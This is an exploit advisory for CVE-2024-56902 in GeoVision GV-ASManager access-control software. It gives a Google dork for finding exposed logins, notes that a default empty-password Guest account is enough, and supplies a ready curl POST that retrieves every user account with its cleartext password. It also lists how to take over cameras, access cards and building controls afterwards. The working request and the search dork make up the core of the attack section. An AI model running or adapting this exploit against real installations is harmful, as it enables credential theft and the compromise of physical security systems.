<\/p>\n
# Exploit Title: Information Disclosure in GeoVision GV-ASManager
\n# Google Dork: inurl:\"ASWeb\/Login\"
\n# Date: 02-FEB-2025
\n# Exploit Author: Giorgi Dograshvili [DRAGOWN]
\n# Vendor Homepage: https:\/\/www.geovision.com.tw\/
\n# Software Link: https:\/\/www.geovision.com.tw\/download\/product\/
\n# Version: 6.1.0.0 or less
\n# Tested on: Windows 10 | Kali Linux
\n# CVE : CVE-2024-56902
\n# PoC: https:\/\/github.com\/DRAGOWN\/CVE-2024-56902
\n
\n
\nInformation disclosure vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.
\n
\nRequirements
\nTo perform successful attack an attacker requires:
\n- GeoVision ASManager version 6.1.0.0 or less
\n- Network access to the GV-ASManager web application (there are cases when there are public access)
\n- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: )
\n
\nImpact
\nThe vulnerability can be leveraged to perform the following unauthorized actions:
\nA low privilege account is able to:
\n- Enumerate user accounts
\n- Retrieve cleartext password of any account in GV-ASManager.
\nAfter reusing the retrieved password, an attacker will be able to:
\n- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
\n- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
\n- Disrupt and disconnect services such as monitoring cameras, access controls.
\n- Clone and duplicate access control data for further attack scenarios.
\n- Reusing retrieved password in other digital assets of the organization.
\n
\ncURL script:
\n
\ncurl --path-as-is -i -s -k -X $'POST' \\
\n -H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \\\"Linux\\\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \\\"Not?A_Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"130\\\"' -H $'Content-Type: application\/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/130.0.6723.70 Safari\/537.36' -H $'Accept: *\/*' -H $'Origin: https:\/\/192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \\
\n -b $'[SET-COOKIE - WRITE WHAT IS AFTER \"Cookie:\"]' \\
\n --data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \\
\n $'[SET-TARGET]\/ASWeb\/bin\/ASWebCommon.srf'
\n
\n
\nAfter a successful attack, you will get access to:
\n- ASWeb\t- Access & Security Management
\n- TAWeb\t- Time and Attendance Management
\n- VMWeb\t- Visitor Management
\n- ASManager - Access & Security Management software in OS\n <\/blank><\/code><\/pre>\n<\/p><\/div>\n